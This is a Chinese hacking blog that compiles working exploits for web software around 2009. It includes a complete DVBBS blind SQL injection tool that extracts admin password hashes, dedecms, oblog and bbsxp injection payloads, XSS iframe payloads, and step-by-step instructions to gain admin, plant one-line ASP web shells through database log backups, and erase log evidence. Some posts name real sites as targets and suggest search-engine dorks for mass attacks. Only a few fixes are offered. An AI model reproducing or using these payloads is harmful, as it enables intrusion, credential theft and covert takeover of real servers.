Chinadu's Blog

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt
阅读全文...

作者：张恒
dedecms5.3和5.5系列版本存在重大注入漏洞，请注意以下操作有攻击性，仅供研究。利用此漏洞进行违法活动者，后果自负。

假设域名是：www.abc.com 攻击步骤如下：
1. 访问网址：

http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

可看见以下错误信息:

阅读全文...

作者： 普瑞斯特

Discuz账号发放插件注入0day

插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:
阅读全文...

Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability

function Copyright()
{

var Author=”80sec”;
var Email=”kEvin#80sec.com”.replace(”#”,”@”)
var Site=”http://www.80sec.com”;
var Date=new Date(2009,4,24).toLocaleString();
var Reference=”http://www.80sec.com/Microsoft-Internet-Infomation-Server-6-ISAPI-filename-analytic-Vulnerabilitie.html”;
return Reference;

}

/*

漏洞描述:

IIS6 (Internet Infomation Server 6.0) 是微软出品的一款WEB服务器系统, 广泛用于各种个人/商业信息发布/网站架设领域。80sec在测试中发现, IIS设计上在处理畸形文件名的时候存在一个严重的安全漏洞, 可能绕过web程序的逻辑检查从而能导致服务器以IIS进程权限执行任意恶意用户定义的脚本, 黑客可以通过制造畸形的服务器文件来触发该 漏洞, 并从而控制服务器.

漏洞厂商:

Microsoft [ http:\/\/www.microsoft.com ]

漏洞测试:

Undefined

解决方案:

等待微软更新官方补丁.

*/

PS：

个人测试了一下 应用不是十分广泛 不过还是一个0day 还是有应用价值的

一个月前看了看了dedecms代码（只看了plus下的文件），发现有些变量人为控制没有过滤，但是在php的魔法引号这道天然屏障面前利用几率不好

但是联想到gbk的宽字符，突破方法就有了



漏洞文件：plus/infosearch.php

测试版本：5.1 gbk

描述：$q变量没有过滤直接进入查询，导致注入出现。代码如下：



PHP代码

$q = trim($q);    
if($areaid > 0) {    
 $wheresql = "areaid=$areaid and ";    
}    
   
$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";    
   
   
$dlist = new DataList();    
   
   
$dlist->pageSize = 20;    
$dlist->SetParameter("q",$q);    
$dlist->SetParameter("action",'search');    
$dlist->SetParameter("areaid",$areaid);    
$dlist->SetSource($query);    





“‘”突破了，那就照常注入。

测试站：


http://www.xxx.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,id,4,pwd,6%20from%20dede_admin/*




至于后台拿shell,找不到后台的一样可以轻松拿到shell.不会的留言。

还有几个文件存在注入问题，象feedback.php,后续发放分析。

首先说明下是这个洞是在其他地方看到的，只是他没有说的很清楚，好多菜菜都不明白，我就拿这发我的第一个贴吧！
这个洞其实就是利用了程序的编码漏洞，下载配置和登陆日志文件，一下是利用方法。

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="


http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="


程序后台：

http://dabei.org/admin/index.php?iframe=1


Base64加密代码：

http://dabei.org//cache/adminlogin_logs.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)


http://dabei.org//php168/mysql_config.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="  (引号里面的是Base64加密后的)


批量抓webshell：
google,baidu 输入关键字：Powered by PHP168

<html>
<head>
<title>Dvbbs·php Version 2.0++ Blind SQL Injection Exploit</title>
<script language="Javascript" type="text/javascript">
/*
----------------------------------------------------------------------------------------------
- DVBBS PHP 2.0 Forum Blind SQL Injection Exploit   -
- Info ---------------------------------------------------------------------------------------
- Author: oldjun -----------------------------------------------------------------------------
- Exploit Coded By T00LS.NET -------------------------------------------------------------
- Site: http://www.t00ls.net ----------------------------------------------------------------
----------------------------------------------------------------------------------------------
*/
function myrefresh()
{
   window.location.reload();
}
function makewhat(x){
var whereto=new Array(2)//新建一个数组，项数为第一个下拉列表的项数
for(i=0;i<2;i++)//循环第一个下拉列表的项数那么多次
       whereto[i]=new Array();//子循环
       //下面是给每个循环赋值
         whereto[0][0]=new Option("后台密码","0");
         whereto[0][1]=new Option("后台用户名","1");
         whereto[0][2]=new Option("关联前台用户名","2");
         whereto[1][0]=new Option("前台密码","3");
         whereto[1][1]=new Option("前台用户名","4");
var what=document.form.what;//方便引用
for(m=what.options.length-1;m>0;m--)
//这个要看清楚,因为要重新填充下拉列表的话必须先清除里面原有的项,清除和增加当然是有区别的了,所以用递减
       what.options[m]=null;//将该项设置为空,也就等于清除了
for(j=0;j<whereto[x].length;j++){//这个循环是填充下拉列表
       what.options[j]=new Option(whereto[x][j].text,whereto[x][j].value)
       //注意上面这据,列表的当前项等于 新项(数组对象的x,j项的文本为文本，)
}
what.options[0].selected=true;//设置被选中的初始值
}
function submitForm(){
if (pass!=""){
alert("please refresh this page and try again!");
setTimeout('myrefresh()',1000); 
return false;
}
var host= document.getElementById("host").value;
var userid = document.getElementById("userid").value;
//后台
if(document.form.where.value==0){
var params ="?t=9&action=join&activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_admin/**/where/**/id="+userid;
}else{
//前台
var params ="?t=9&action=join&activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_user/**/where/**/userid="+userid;}
var url = host+"/topicother.php"+params;
document.getElementById("md5hash").innerHTML = "Exploiting, Please Wait..";
var p="temp";
var w=document.form.what.value;
alert('Now begin to exploit!');
sendCall('1','48',url,w,p);
}
</script>
</head>
<body>
<font color=#CC0000>-Dvbbs·php Version 2.0++   Blind SQL Injection Exploit -</font>
<p><p>
<form name="form" action="" method="post">
<TABLE>
<TR>
<TD>host</TD>
<TD><INPUT TYPE="text" NAME="host" id="host" value="http://www.t00ls.net" size="30px">(URL to Dvbbs Php Forum Site: http://www.t00ls.net/bbs)</TD>
</TR>
<TR>
<TD>userid</TD>
<TD><INPUT TYPE="text" NAME="userid" id="userid" value=1 size="30px">(UserID of the user you want to get the information)</TD>
</TR>
<TR>
<TD>where</TD>
<TD>
<select name="where" size="1" onchange="makewhat(options.selectedIndex)">
<option value="0" selected>后台</option>
<option value="1">前台</option>
</select>(front or back)
</TD>
</TR>
<TR>
<TD>what</TD>
<TD>
<select name="what">
<option value="0">后台密码</option>
<option value="1">后台用户名</option>
<option value="2">关联前台用户名</option>
</select>(what do you need,don't support Chinese username)
</TD>
</TR>
<TR>
<TD>
</TD>
<TD>
<INPUT TYPE="button" name="submit" value="Exploit" onclick="submitForm();"></TD>
</TR>
</TABLE>
</form>
<div><font color=red><B>Output (whole username or MD5 Hash of password):</B></font><span id="md5hash"></span></div>
<hr>
Browser support: [IE7.0|IE6.0] [FF2.0]
<p>
Coded by T00LS.NET
<script language="javascript">
var xmlHttp;
var pass;
pass="";
function sendCall(i,j,url,w,p) {
if (p=="temp"){p=url}
//以下用户名暂不支持中文...
//后台密码、用户名、关联的前台用户名
switch(parseInt(w)){
case 0:url = p+"/**/and/**/ascii(mid(password,"+i+",1))="+j+")/**/";break;
case 1:url = p+"/**/and/**/ascii(mid(username,"+i+",1))="+j+")/**/";break;
case 2:url = p+"/**/and/**/ascii(mid(adduser,"+i+",1))="+j+")/**/";break;
//前台密码、用户名
case 3:url = p+"/**/and/**/ascii(mid(userpassword,"+i+",1))="+j+")/**/";break;
case 4:url = p+"/**/and/**/ascii(mid(username,"+i+",1))="+j+")/**/";break;
}
if (window.ActiveXObject) {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} else if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
//解决FF中跨域问题
try{ 
       netscape.security.PrivilegeManager.enablePrivilege( "UniversalBrowserRead "); 
   } catch (e) { 
       alert( "Permission UniversalBrowserRead denied. "); 
   } 
}
xmlHttp.onreadystatechange = function() {
if(xmlHttp.readyState == 4 && xmlHttp.status ==200) {
var str = xmlHttp.responseText;
//alert(str);
var md5hash=document.getElementById("md5hash");
//if(str.match(/\u8bf7\u767b\u9646\u540e\u64cd\u4f5c/)) {
if(!str.match(/\u672c\u6d3b\u52a8\u62a5\u540d\u4eba\u6570\u5df2\u6ee1/)) {
pass += String.fromCharCode(j);
md5hash.innerHTML = pass;
j = 48;
i++;
}
//如果检测用户名，直接使用else {j++; }
else {
if(j == 59&&(parseInt(w)==0||parseInt(w)==3)) {&n
bsp;j = 96; }
else { j++; }
}

if(pass.length >= 16) { alert("Exploitation Successfull!. Admin MD5 Hash(or username): "+pass); return true; }
sendCall(i,j,url,w,p);
}
}
xmlHttp.open('GET', url, true);
//xmlHttp.setrequestheader('Content-Type','text/html; encoding=gb2312');
//xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(null);
}
</script>
</body>
</html>


看如下代码：

<%
userid=getcookie("clubuser_id")
............
if Application("FTBBSMB")(7,0)="M" then
inFolder=year(date())&month(date())
else
inFolder=year(date())&month(date())&day(date())
end if

call makefolder(inFolder,fso)
myFolder = inFolder&"/"&userid
call makefolder(myFolder,fso)
...................
formPath=inFolder&"/"&userid
......上传过程省略.....

建立的文件夹读取的COOKIE里的userid

修改COOKLIE里userid的值为fuck.asp形式即可建立IIS 6.0缺陷文件夹导致可以上传JPG的小马

至于修改COOKIE各位大大应该都会吧~FTBBS貌似所有版本都有此问题吧~

怎么利用大家自己来咯~

自从上次oblog的tb.asp和js.asp文件出现漏洞后，直至今日oblog都没有爆出什么安全问题，前些日子官方发布了4.6稳定版，趁着无聊下下来看看代码的安全性，没想到还真的发现了一些问题。后来联系了oblog的客服，可是在qq上验证了几次人家也没有理我，没办法，那就只能发出来了。

      我们先来简单分析一下漏洞的成因：漏洞出现在user_diggs.asp文件第304行左右，用Request获得topic的值，然后用oblog.InterceptStr处理后赋给topic。oblog.InterceptStr的作用只是截断字符而已，并没有过滤特殊字符。接着往下看，在第316行就直接把topic放到了SQL语句里进行了数据库操作，这样漏洞就形成了。4.6版的ACCESS和SQL 都存在这个问题，但是因为变量所在的SQL语句是update，所以我们并不能用union来联合暴出密码，唯一的方法就只有用“;”来执行多语句，而ACCESS并不支持多语句，因此漏洞只影响到SQL版本。

      接下来是小菜们最关心的问题：怎么利用这个漏洞。我们先注册一个用户随便发篇日志。然后到自己的首页去推荐这篇日志，就是在图中 “推荐”处点击一下。接着回到用户管理后台，点击常用菜单里的“推荐日志”，就会看到刚才我们推荐的日志，我们把鼠标放到“修改”上，会看到推荐日志的id，这里的id是2。接着点击“修改”，在摘要里写入下面这个语句：

     s’/**/WHERE/**/logid=2;update/**/oblog_user/**/set/**/useremail=’竹子’/**/where/**/username=’lovewin2k’;--

      这是一个简单的SQL语句，我对它稍做一些解释：其中的s’是为了和前面的’闭合。/**/是注释符，作用是用来代替空格。Logid=2中的2是刚才我们看到的日志id。然后用一个分号结束这一语句，接着是一个新的SQL语句，update/**/oblog_user/**/set/**/useremail=’竹子’/**/where/**/username=’lovewin2k’;--的意思是把oblog_user表里username等于lovewin2k的useremail更改为竹子。单击“确认修改”后提示修改成功。我们去验证一下，看看自己个人资料里的邮箱是不是真的被改成了竹子，可以看到确实已经被更改成了竹子。

      接下来我们在网上找个oblog实战一把，先说说如何查找4.6SQL版的oblog。我们先在百度里查找关键字“Copyright by oblog.cn”，然后随便打开一个blog，在主页后面添加ver.asp来查看版本，比如我在这里找的是http://www.zuliao365.com/blog，那就应该通过 http://www.zuliao365.com/blog/ver.asp来查看当前oblog的版本。如果是SQL版的那我们就可以打开利用工具，在目标主机里填写blog主页的地址，如： http://www.zuliao365.com/blog /index.html，点击“浏览”并用注册的用户登录以获得cookie。然后在用户名和密码里填写你要添加的管理员名字和密码，我这里添加一个用户名是竹子，密码是123456的管理员，日志id填写你自己所推荐日志的id。单击“发送”提示发送成功。我们访问后台http://www.zuliao365.com/blog/ admin/admin_login.asp，尝试用刚刚添加的管理员登录后台，果然成功登录。

      我们当然不会仅仅满足于做个管理员，既然利用的版本是SQL的，那我们就直接用日志备份来获得webshell。单击后台里的“服务器组件配置”，如图9。在“站点物理地址”处可以看到网站的路径，记下来，等会备份的时候要把一句话木马备份到这里，这里是：e:\wwwroot\zuliao\wwwroot。接着在工具的下拉框里选择“更新库名到Email”，“注册用户名字”填写你在blog里注册的用户名字，单击“发送”，我们去个人资料里看看Email里的内容吧！选择“综合设置”中的“用户设置”看到库名已经被更新到了Email里了，我这里获得的库名是sq_zuliao，如图10。继续在工具的下拉框选择“备份数据库获得shell”，然后在库名和路径分别填写刚才我们获得的sq_zuliao和e:\wwwroot\zuliao\wwwroot \test.asp，test.asp是你自己一句话木马的文件名，单击“发送”，如图11。默认备份的一句话木马是海洋的<%eval request("#")%>，我们用海洋客户端连接 http://www.zuliao365.com /test.asp看看是否备份成功，可以看到我们已经成功获得了webshell，如图12。接下来该如何提升权限就看各位大显神通了。

关于如何修补漏洞的问题，把存在漏洞的语句

des = oblog.InterceptStr(RemoveHtml(Trim(Request("edit"))),255)

topic = oblog.InterceptStr(Trim(Request("topic")), 255)

替换成

des = oblog.filt_badstr (oblog.InterceptStr(RemoveHtml(Trim(Request("edit"))),255))

topic = oblog.filt_badstr (oblog.InterceptStr(Trim(Request("topic")), 255))

就可以了。

Author: 刺
昨天放出来的exp让大家狠狠的爽了一把吧，听说有人连续提权了十多台webshell的。

今天MS更新了安全公告

这个漏洞是由于在NetworkService 或者 LocalService 下运行的代码，可以访问同样是在 NetworkService 或者 LocalService 下运行的进程，某些进程允许提升权限为LocalSystem。

对于IIS，默认安装是不受影响的，受影响的是你的ASP.NET代码是以 Full Trust 运行，如果权限低于 Full Trust，也不会受影响。老的Asp 代码不受影响，只有 ASP.NET才受影响。

对于 SQL Server，如果用户以administrative 权限运行代码，则会受影响

对于Windows Server 2003，攻击者可以通过MSDTC获取token访问其他同样token的进程，从而可能造成提权。

任何具有SeImpersonatePrivilege的进程都有可能造成提权。

对于服务器管理员来说，做一些简单的调整可以在IIS上对抗此威胁。

IIS 6.0 - Configure a Worker Process Identity (WPI) for an application pool in IIS to use a created account in IIS Manager and disable MSDTC

很多博客都存在的漏洞。其实不是什么新鲜东西了。发出来大家参考一下！本博也存在跨站漏洞。不要攻击啊~
废话不说了，看正文~
此漏洞在 search.asp 模块过滤不严造成的！
测试的内容这次是输入:

<iframe src=http://www.4shell.org></iframe>


之后按“查找”
将会发现，百度给套到网页里了！ 呵，这表明跨站是成功的！

其实这个漏洞很早就人发现的，但好像没人理会！

但有意的伪造，利用还是不小的！

http://www.xxxx.net/search.asp?SearchContent=<iframe src=http://www.4shell.org></iframe>&searchType=title


改成:


http://www.xxxx.net/search.asp?SearchContent=%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D%3E%3C%2F%69%66%72%61%6D%65%3E&searchType=title


对于自己网站的网址，很多人都不会在意，也看不出连接的内容是什么，如果改为木马的内容，再把iframe的高度和宽度改为0，就不显示了！
这样给种马了都不知什么事了！

又或者利用管理员点击你的连接，做点管理员可以做的事，但可以做什么事，我就没有深究了！


解决方法：
找到 关键词:

 <b><%=SearchContent%>


改为 关键词:

 <b><%=HTMLEncode(SearchContent)%>


可能有些博客有些不同，请自己看着办吧！

bbsxp前段时间出了个log的注入漏洞，这次的漏洞还是出现在这个地方。

sub Log(Message)
if Request.ServerVariables("Query_String")<>"" then Query_String="?"&Request.ServerVariables("Query_String")&""
Conn.Execute("insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('"&CookieUserName&"','"&Request.ServerVariables("REMOTE_ADDR")&"','"&HTMLEncode(Request.Servervariables("HTTP_User_AGENT"))&"','"&Request.ServerVariables("request_method")&"','http://"&Request.ServerVariables("server_name")&""&Request.ServerVariables("script_name")&""&Query_String&"','"&HTMLEncode(Request.ServerVariables("HTTP_REFERER"))&"','"&Err.Description&"','"&Request.Form&"','"&Message&"')")
end sub


上次漏洞就是出现在HTTP_REFERER上，最新版本的已经用HTMLEncode处理过了。其实在在这个log()里面还是有我们可以控制的变量,就是Request.Form
注册个用户yl6364,发个贴再编辑。抓包如下:

POST /bbsxp/editpost.asp?threadid=1&postid=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://localhost/bbsxp/editpost.asp?threadid=1&postid=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skins=1; Eremite=0; UserID=2; Userpass=1679707407E0FEDAA79EA80AB389A964; Onlinetime=2007%2D3%2D10+21%3A30%3A37; ForumNameList=%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D1%27%3E%u7F51%u7EDC%3C/option%3E; ASPSESSIONIDSQCDCSQA=NBOPHAJCAIEFFCMHGDFJNKBH; ASPSESSIONIDSCTRRACA=OCIBAKBAFDDDJAADKKJBPBNI

content=test+log&UpFileID=&Category=&Subject=test+log


变量Request.Form就是

content=test+log&UpFileID=&Category=&Subject=test+log


上面的变量都是经过HTMLEncode处理的，但是我们还是可以想办法饶过去。
我们可以伪造变量,比如我们把content=test+log&UpFileID=&Category=&Subject=test+log改为
content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love
记得修改Content-Length,打开bbsxp_log表看见POSTData为:
content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love
看出点什么来了吗嘿嘿，我们伪造的变量yl6364就这样进数据库了。因为是伪造的变量所以自然是没有经过任何的过滤。下面思路就清晰了，提升权限为管理员然后进后台查看网站的路境，再利用log备份拿webshell
提升权限:

content=test+log&UpFileID=&Category=&Subject=test+log


改为:

content=test+log&UpFileID=&Category=&Subject=test+log&yl6364=love','');update bbsxp_users set userroleid=1 where username='yl6364'--


这样就变为前台的管理员。

修改后台的密码:

update bbsxp_sitesettings set adminpassword='md5密码'--


bbsxp经过md5加密的密码字母都是大写的

获得数据库的名:

update bbsxp_users set usermail=db_name() where username='yl6364'--


log备份拿webshell:

alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(35)):response.end%>');backup log bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--


修改后台密码要记得改回来哦，不然管理员就进不了后台了，所以最好弄得到管理员密码。
最后要记得擦PP,

delete * from bbsxp_log where username='yl6364'--


ps:官方论坛我测试过没有成功，不知道什么原因。不过在本地和网上测试成功!

4a5d4ec6a5f778c3bb21f257cdc89154

update bbsxp_users usermail=(select adminpassword from bbsxp_sitesettings) where username='yl6364'--